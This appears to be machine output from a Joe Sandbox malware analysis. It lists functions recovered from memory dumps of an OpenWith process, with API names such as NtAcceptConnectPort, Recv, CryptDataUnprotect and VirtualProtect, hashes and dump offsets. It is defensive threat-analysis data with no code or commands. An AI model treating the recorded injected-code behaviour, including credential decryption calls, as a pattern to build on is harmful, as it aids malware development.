                                              • Opcode ID: 6300fb348d49a47f7ce5e25661db4a1277b3c7de01d4304b532d2da97ee81cb4
                                              • Instruction ID: 675b4bc7042c5a46ac9862ce4d67122b0c09aee3b20f2a93eb0a9e4cd746f719
                                              • Opcode Fuzzy Hash: 6300fb348d49a47f7ce5e25661db4a1277b3c7de01d4304b532d2da97ee81cb4
                                              • Instruction Fuzzy Hash: 70C18130608A549FDB68EF28C8C57AA77E0FB89700F14467ED84FCB696D734A851CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 1a40425d81a0dda3cd82788b19327da5a379df3b5c3bd351d49e58af76a5eeec
                                              • Instruction ID: 223ff4ab5996e9e7c2aeb8e5df67d68c105b0cbb58bf77d84fe167e61c3b0fb6
                                              • Opcode Fuzzy Hash: 1a40425d81a0dda3cd82788b19327da5a379df3b5c3bd351d49e58af76a5eeec
                                              • Instruction Fuzzy Hash: 6C817231A1CB8D9BEB65DA58989466BB3E0FFD4340F50563BF58BC7190EB68F8408681
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Recv
                                              • String ID:
                                              • API String ID: 4192927123-0
                                              • Opcode ID: 7916fdf4d3e942b440d7f5c412e90116e139ebed5d60f444feec34680a904e5a
                                              • Instruction ID: 433af34013b0f5ff40f37bcfc74de91a638b0cd20f7a01f94af9edd6466b4334
                                              • Opcode Fuzzy Hash: 7916fdf4d3e942b440d7f5c412e90116e139ebed5d60f444feec34680a904e5a
                                              • Instruction Fuzzy Hash: 29512770508B899FEBA8EF29D8C8B9677E0FF94314F50056AD44BC7961DB39E844CB41
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 5c97c20283281d0f686864c64b2abe35391f7ab31688f0fa8af160c1736108da
                                              • Instruction ID: fa8061214311007d8179a54196288c3e3787311b3af9fae363fcf3e16f18b404
                                              • Opcode Fuzzy Hash: 5c97c20283281d0f686864c64b2abe35391f7ab31688f0fa8af160c1736108da
                                              • Instruction Fuzzy Hash: 9531A131B1CE4D6FEB585E189CC557A73E0EF89325F20463FEA4FC3291DA18B8028681
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: CryptDataUnprotect
                                              • String ID:
                                              • API String ID: 834300711-0
                                              • Opcode ID: a07a12428c7964199d363ccabf4b149c9f1c56c6408fd6f078d364f4c66a6574
                                              • Instruction ID: fe076b2313c9a1fd04698ed2d963bfd7d4941b83a9826ce29d5b36ba59d79cdf
                                              • Opcode Fuzzy Hash: a07a12428c7964199d363ccabf4b149c9f1c56c6408fd6f078d364f4c66a6574
                                              • Instruction Fuzzy Hash: A931723071CA885FD758DB58D88966BB7E2EFC9341F50453EE58AC3251DA74D8418B42

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 118 1f6643815ac-1f6643815de 119 1f6643815e0-1f6643815e3 118->119 120 1f6643815e5-1f6643815e7 118->120 121 1f66438160b-1f664381659 NtAcceptConnectPort 119->121 122 1f6643815f7-1f6643815f9 120->122 123 1f6643815e9-1f6643815f5 120->123 124 1f664381609 122->124 125 1f6643815fb-1f664381607 122->125 123->121 124->121 125->121
                                              APIs
                                              • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,000001F664381E16), ref: 000001F664381640
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
                                              • Instruction ID: 68d5deb407fe26c1f082026f4cec096c6c80b1f8e2b3070a69941fcfb9d662c5
                                              • Opcode Fuzzy Hash: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
                                              • Instruction Fuzzy Hash: D5219371508B098FEB54DF58C4C96AAFBE1FB68305F040A3EE49AD7260D730D884CB41
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: d99824a7b56689602d55d9b975c23b4966fb1dfc1a28fa016acf5b8b83f0fdf8
                                              • Instruction ID: d841494474a3f5a558d0f5f5493a6b40fd9f932b1f5fe8231cd50afa829c4412
                                              • Opcode Fuzzy Hash: d99824a7b56689602d55d9b975c23b4966fb1dfc1a28fa016acf5b8b83f0fdf8
                                              • Instruction Fuzzy Hash: 66F0623491C7C49FDBA0EB688480B9ABBF0BBAA350F544A1EE8CCC3211D73595848B43
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: af3340e2b301fb20eba4bd36f70d30fdbe005acca17dd1e0c445e9428843075b
                                              • Instruction ID: 5973225f19a5277b416901d33b7d8b37b483e83b1efc55eda5b3186287b169d0
                                              • Opcode Fuzzy Hash: af3340e2b301fb20eba4bd36f70d30fdbe005acca17dd1e0c445e9428843075b
                                              • Instruction Fuzzy Hash: 86F0D070A1CB848FDBA4EF2CD4C5B5977E1FB98300F50451AE44CC3245DB3498848B46
                                              APIs
                                              • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF42189341C), ref: 00007DF4218AAF8A
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 1d9a6f3c19fc3a1664a9a6811ff4ba6c27299ee4e4794d390710366357d59dbc
                                              • Instruction ID: 3ce863771c24511ec9815e8a9d4627af9eafbc55e5dcd6b5797b555e9f226877
                                              • Opcode Fuzzy Hash: 1d9a6f3c19fc3a1664a9a6811ff4ba6c27299ee4e4794d390710366357d59dbc
                                              • Instruction Fuzzy Hash: 83E09271618A488FDB04DF98CCC186AB3F4FBD9300F004D7BE88AC7164D274E698CA82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 4927af5c10e17f27f2edd3b7dd4d43612d79bd47543f67f71f12626d98bff908
                                              • Instruction ID: 44ad22ff6b71b5a1d1d8ac20430f073337ca410c781d782f28102146b08b1aad
                                              • Opcode Fuzzy Hash: 4927af5c10e17f27f2edd3b7dd4d43612d79bd47543f67f71f12626d98bff908
                                              • Instruction Fuzzy Hash: FED05E38E68AC94BE610A728894021A36E2FFD5308F904625D889C2250D23CE4018382
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: a9327488733b823840a3f29582a089392b2a1446868cb63a967a810240f58cb8
                                              • Instruction ID: 6c853213fabd2d7a89a8ca7a0a5108db0716eda2e29dbb407cf80726018a3741
                                              • Opcode Fuzzy Hash: a9327488733b823840a3f29582a089392b2a1446868cb63a967a810240f58cb8
                                              • Instruction Fuzzy Hash: 19D0A730D6CB894BD610B728CC8061637F1FFD4305F944625D88EC3240D23CE44183C6
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: eb8f498348e5c7f372421b27a3827434041340d731fc3728b954386bc4ea4cc4
                                              • Instruction ID: 97d99beb0c9a37cb07dcfb3822d3cf69b2440984d44853db4e8168537db0ea0c
                                              • Opcode Fuzzy Hash: eb8f498348e5c7f372421b27a3827434041340d731fc3728b954386bc4ea4cc4
                                              • Instruction Fuzzy Hash: 1FD05E20A28A894BD650A728898030637E2FBD9304F914625E44EC2200D23CE41143C2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 333093483b5b65ac6ab85e83ccc52a142bbc301cae1d85d61a22b47e66de8b6c
                                              • Instruction ID: 4be0369c48b7e8e74d6f64da04f8ef67aafbff305c5419e040d9616c22706dbd
                                              • Opcode Fuzzy Hash: 333093483b5b65ac6ab85e83ccc52a142bbc301cae1d85d61a22b47e66de8b6c
                                              • Instruction Fuzzy Hash: DDC08C20A2C80B2BF92462B94CC065520A0AF8C304F820022E80AC2580E42CE4E09392
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 953671860da08bf31fab518e05a010f803d920f951da2702e38e3d0cf3acdea6
                                              • Instruction ID: f0f5aa8286fc66391b883e00b05d637c5091485ad3ee71221f9181c118e8e90a
                                              • Opcode Fuzzy Hash: 953671860da08bf31fab518e05a010f803d920f951da2702e38e3d0cf3acdea6
                                              • Instruction Fuzzy Hash: 99C08C00AA980BABE90C62AAACC035920A4AF88300F800022E40EC29C0E42EE4D44392
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: rE\
                                              • API String ID: 544645111-988334199
                                              • Opcode ID: dc7abe3753608a406b2e8c4677f2e3e348cb1d8b9abc271147da51083885c1c3
                                              • Instruction ID: edffda9bb1467faf4408997dc313cfae8510db6a3579cb8050d219e8e3253def
                                              • Opcode Fuzzy Hash: dc7abe3753608a406b2e8c4677f2e3e348cb1d8b9abc271147da51083885c1c3
                                              • Instruction Fuzzy Hash: 84217F317189485FEB45F758E8D1AAB72E6FBD8740F10003AE84BC3285DE28ED4587C2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1431623286.000001F665D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F665D80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_1f665d80000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AllocateHeap$BoundaryDeleteDescriptor
                                              • String ID: l
                                              • API String ID: 2279964584-2517025534
                                              • Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
                                              • Instruction ID: ab3d3daedbf78520becf6715b6bd08b6073b5bf7b7f64d5ab14cc96a4b0f0932
                                              • Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
                                              • Instruction Fuzzy Hash: B0A1F1316186595AE729AA2C88837FE77D1FBD5310F20167EE4CBC32C3E924DD468686
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-3916222277
                                              • Opcode ID: 45ee73fde44b844a7982fd6fa2bb9a274e67d6e904138dbe31d6ae3e461be495
                                              • Instruction ID: 367a69104559c4b46e80f94264a1b244cc2b60130d1c0cbfeee853616ab18060
                                              • Opcode Fuzzy Hash: 45ee73fde44b844a7982fd6fa2bb9a274e67d6e904138dbe31d6ae3e461be495
                                              • Instruction Fuzzy Hash: D9115931A08C9A1BE718A768EC946B773F0FBC4311F544176E85BC32E0DA1CE852C785
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@$_calloc_dbg_malloc_dbg
                                              • String ID:
                                              • API String ID: 3423559903-0
                                              • Opcode ID: 6cebd9367394abf21773eb1584d65681aa51e4210b0eb886ea29ebe4f46530e1
                                              • Instruction ID: 9d2c49c115992e4282ff6a540ac0df78824d20530ceb8597dbec5bc75800a5c6
                                              • Opcode Fuzzy Hash: 6cebd9367394abf21773eb1584d65681aa51e4210b0eb886ea29ebe4f46530e1
                                              • Instruction Fuzzy Hash: 51421D31518E489FEB95EF28D8C9AAAB7E1FB98300F104A2AD45FC7251DB34A545CB81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg$??3@
                                              • String ID:
                                              • API String ID: 2216462316-0
                                              • Opcode ID: f833b09acc7dcda6218a08ced81fc052c99920b07a41f041528abf3627ace0e1
                                              • Instruction ID: 57e9ba68f2a4e18469a4c98be4bc3329781083e0261b36114588390415665c03
                                              • Opcode Fuzzy Hash: f833b09acc7dcda6218a08ced81fc052c99920b07a41f041528abf3627ace0e1
                                              • Instruction Fuzzy Hash: 57317131608A0D6FAB58EE64DC85A76B3E5FF90390701423AD41BC6591EF74F85187C1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Completion$CreateFileModesNotificationPortioctlsocket
                                              • String ID:
                                              • API String ID: 1455841399-0
                                              • Opcode ID: b0ef64daf23010be4df91d754ff29401ba7eeb6e21b37df906d22bfb74ec9eab
                                              • Instruction ID: 4917041bf6e07e963e43226c923fcbff43ff2bc70e561cad6733882da0973339
                                              • Opcode Fuzzy Hash: b0ef64daf23010be4df91d754ff29401ba7eeb6e21b37df906d22bfb74ec9eab
                                              • Instruction Fuzzy Hash: 5C31A27060CB985BFBA89B389CC563732F5FF95315F50007AEC0FD2192DA2AEC418A91
                                              APIs
                                                • Part of subcall function 00007DF4218AAF60: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF42189341C), ref: 00007DF4218AAF8A
                                              • CreateFileMappingW.KERNELBASE ref: 00007DF4218998AE
                                              • _calloc_dbg.MSVCRT ref: 00007DF4218999E8
                                                • Part of subcall function 00007DF421899478: CreateFileW.KERNELBASE ref: 00007DF4218994D0
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: CreateFile$AcceptConnectMappingPort_calloc_dbg
                                              • String ID:
                                              • API String ID: 3868319652-0
                                              • Opcode ID: d1b445dc56701135788b0dc920e68535db059dd4faca11d9a453a424e093dfee
                                              • Instruction ID: 2b31e26b8ac075e2c09a6085c48f7fb8e012bcedb06ccc159202e036878b4f22
                                              • Opcode Fuzzy Hash: d1b445dc56701135788b0dc920e68535db059dd4faca11d9a453a424e093dfee
                                              • Instruction Fuzzy Hash: 27D14E71A1CB889BD765EF28D8856ABB7E1FF94300F14453EE48FC2291DF34A5058B86
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg$??3@
                                              • String ID:
                                              • API String ID: 2216462316-0
                                              • Opcode ID: 352f2f2cecbb3e27f866ef48949e4e4dcfd5ee98b9eced5f0af6e5ea8a5601e0
                                              • Instruction ID: 16ad07965c4c074274bce08fa4352359e213b5db57f2b454fba8a96fb3733b4e
                                              • Opcode Fuzzy Hash: 352f2f2cecbb3e27f866ef48949e4e4dcfd5ee98b9eced5f0af6e5ea8a5601e0
                                              • Instruction Fuzzy Hash: EA71AF31A1C9D85AE339A7189CD56EBB2E1FFD5341F50467FE08FC2183DD38A9498682
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: File$CreateRead_malloc_dbg
                                              • String ID:
                                              • API String ID: 2554620077-0
                                              • Opcode ID: b879bc7b5dc6143657be184a8553957d82cf9a437ba6bdf4bbb2c4680e42a6eb
                                              • Instruction ID: 32059aee2c60bd7f4efb37e8eabfaca51860500356be3dac3ed187d883952e59
                                              • Opcode Fuzzy Hash: b879bc7b5dc6143657be184a8553957d82cf9a437ba6bdf4bbb2c4680e42a6eb
                                              • Instruction Fuzzy Hash: 88716371618B844FD7589F1898C576AB6E1FFD8301F500A3FE5CFC3292EE79A8458642
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: File$CreateRead
                                              • String ID:
                                              • API String ID: 3388366904-0
                                              • Opcode ID: 73db5555d885fd7ea61d85234132b183eb459049274d5711c35081ec0b7aef7a
                                              • Instruction ID: c608e45405a51a9e1215cc5f3cac443792e4dc294b19440fc4b2fa7589d7ec37
                                              • Opcode Fuzzy Hash: 73db5555d885fd7ea61d85234132b183eb459049274d5711c35081ec0b7aef7a
                                              • Instruction Fuzzy Hash: BD417F716086884FEB58EF289CC566B77E9FBD9701F10453EE98FC3291EE24D8418786
                                              APIs
                                                • Part of subcall function 00007DF4218AACC8: NtAcceptConnectPort.NTDLL ref: 00007DF4218AACD8
                                              • _malloc_dbg.MSVCRT ref: 00007DF42189CD0D
                                              • ??3@YAXPEAX@Z.MSVCRT ref: 00007DF42189CD94
                                                • Part of subcall function 00007DF4218A3848: _malloc_dbg.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4218C2CFA), ref: 00007DF4218A3867
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg$??3@AcceptConnectPort
                                              • String ID:
                                              • API String ID: 82011185-0
                                              • Opcode ID: 694a03a6a0a341675988201f7685504af8169e7f1b53cb1e5f9007a100a90dea
                                              • Instruction ID: 9e07c4a4bb69f35c6fe1a30247fddded5c9f3ecb4fa4c6ad6ab72afcac3645d3
                                              • Opcode Fuzzy Hash: 694a03a6a0a341675988201f7685504af8169e7f1b53cb1e5f9007a100a90dea
                                              • Instruction Fuzzy Hash: F1412B71508A4C8FEB54EF19D8C5AA677E5FF98311F00057AE84EC7292DB34E985CB82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: File$CreateRead
                                              • String ID:
                                              • API String ID: 3388366904-0
                                              • Opcode ID: 6dcf9cfff2eacf5cd94369649f002897bcffdea66228e64647734ab7a70026dd
                                              • Instruction ID: 018c7a6dad6bb9b8c556769ac709774cd59a991eaf5cf609e3c5e16f1061034d
                                              • Opcode Fuzzy Hash: 6dcf9cfff2eacf5cd94369649f002897bcffdea66228e64647734ab7a70026dd
                                              • Instruction Fuzzy Hash: 5621C47070C7485FE7689E59ACC627B73E5EBC9711F10023FE98FC2242EE75A8064686
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: e54d32ce24f4b710544f648fa16c64d8d7f0589b34fc61474f65512f49413183
                                              • Instruction ID: 600987e0b944acf96462405b32b311ee825fbd30c747401d888a0bdd8eb20064
                                              • Opcode Fuzzy Hash: e54d32ce24f4b710544f648fa16c64d8d7f0589b34fc61474f65512f49413183
                                              • Instruction Fuzzy Hash: 1E31E52060CA894BE7149B6C9CD87667BD1EF99350F1602B6E88EC72C6CB589C42C382
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                              • Instruction ID: 6cb86869c840f45b480f4e0488377137ac8bc3ccbf12f6c6c54f13390cc1126d
                                              • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                              • Instruction Fuzzy Hash: A8212FB0E088586FDF98EB1CC8C495977A2EFD831576D02B2D81ACB199D625EC81C780
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Path$??3@AcceptConnectNameName_Port_calloc_dbg
                                              • String ID:
                                              • API String ID: 494811334-0
                                              • Opcode ID: 1c81860f17a6367f43a2a94f10a5d32e0a9fa92ddff0a1d18b0803ced88c0a31
                                              • Instruction ID: 77b6461aba8761bf9d20ee185b586929c99f888ac7d610a458b2c87d77ab3d4b
                                              • Opcode Fuzzy Hash: 1c81860f17a6367f43a2a94f10a5d32e0a9fa92ddff0a1d18b0803ced88c0a31
                                              • Instruction Fuzzy Hash: 6AF02831214D0C4FD758AB1C9CC8AB637E1EB94726714463BE00BC3360DE79DD408780

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ExceptionFreeHandlerRemoveVectoredVirtual
                                              • String ID:
                                              • API String ID: 3082376348-0
                                              • Opcode ID: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
                                              • Instruction ID: 02026bc356e89282f3c942f81462682de7a9386523a97217c89960ec493d73b7
                                              • Opcode Fuzzy Hash: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
                                              • Instruction Fuzzy Hash: 80F03A31214A098FDF9CEF95C8D5EF137A4EB28301F0401B9CC0ACB15ADA21E885C791
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _calloc_dbg
                                              • String ID:
                                              • API String ID: 1170608187-0
                                              • Opcode ID: 4c67779dd63165b43659fab8fd510d9b574d13d676e16a29e3859926c8de3004
                                              • Instruction ID: 2e77f6c2954b3fafc5dc254a135aa084aef511de3f35319ef0bc16eff7b9569f
                                              • Opcode Fuzzy Hash: 4c67779dd63165b43659fab8fd510d9b574d13d676e16a29e3859926c8de3004
                                              • Instruction Fuzzy Hash: 8572523051CA889BDB69EB18C8D5ADEB3E1FFD4300F50466EE48F83296DE34E5458786
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 2b200ceb4e4cc9f035faf7b6c1b247c7413155f6bad845cc72cf0ce4a6dd00dc
                                              • Instruction ID: f8ed0b99ab0be99488c7011ce1fb6598d2a9018693b8e51bc1eba1975a4fd70d
                                              • Opcode Fuzzy Hash: 2b200ceb4e4cc9f035faf7b6c1b247c7413155f6bad845cc72cf0ce4a6dd00dc
                                              • Instruction Fuzzy Hash: 04D13D31A1CB885BEB65EF2888D56EB73F1FFD4340F50153BD44FC2192EA78A9458682
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: CreateFileMapping
                                              • String ID:
                                              • API String ID: 524692379-0
                                              • Opcode ID: 090a60165b6d81dbbef6ccd1718067ffa9bcceaffdfa6db13320491a5d5642c1
                                              • Instruction ID: c1ec2bedeedb6bc9ff8f34ba3a02174760f78d38025e3c1a9df208219c7265b4
                                              • Opcode Fuzzy Hash: 090a60165b6d81dbbef6ccd1718067ffa9bcceaffdfa6db13320491a5d5642c1
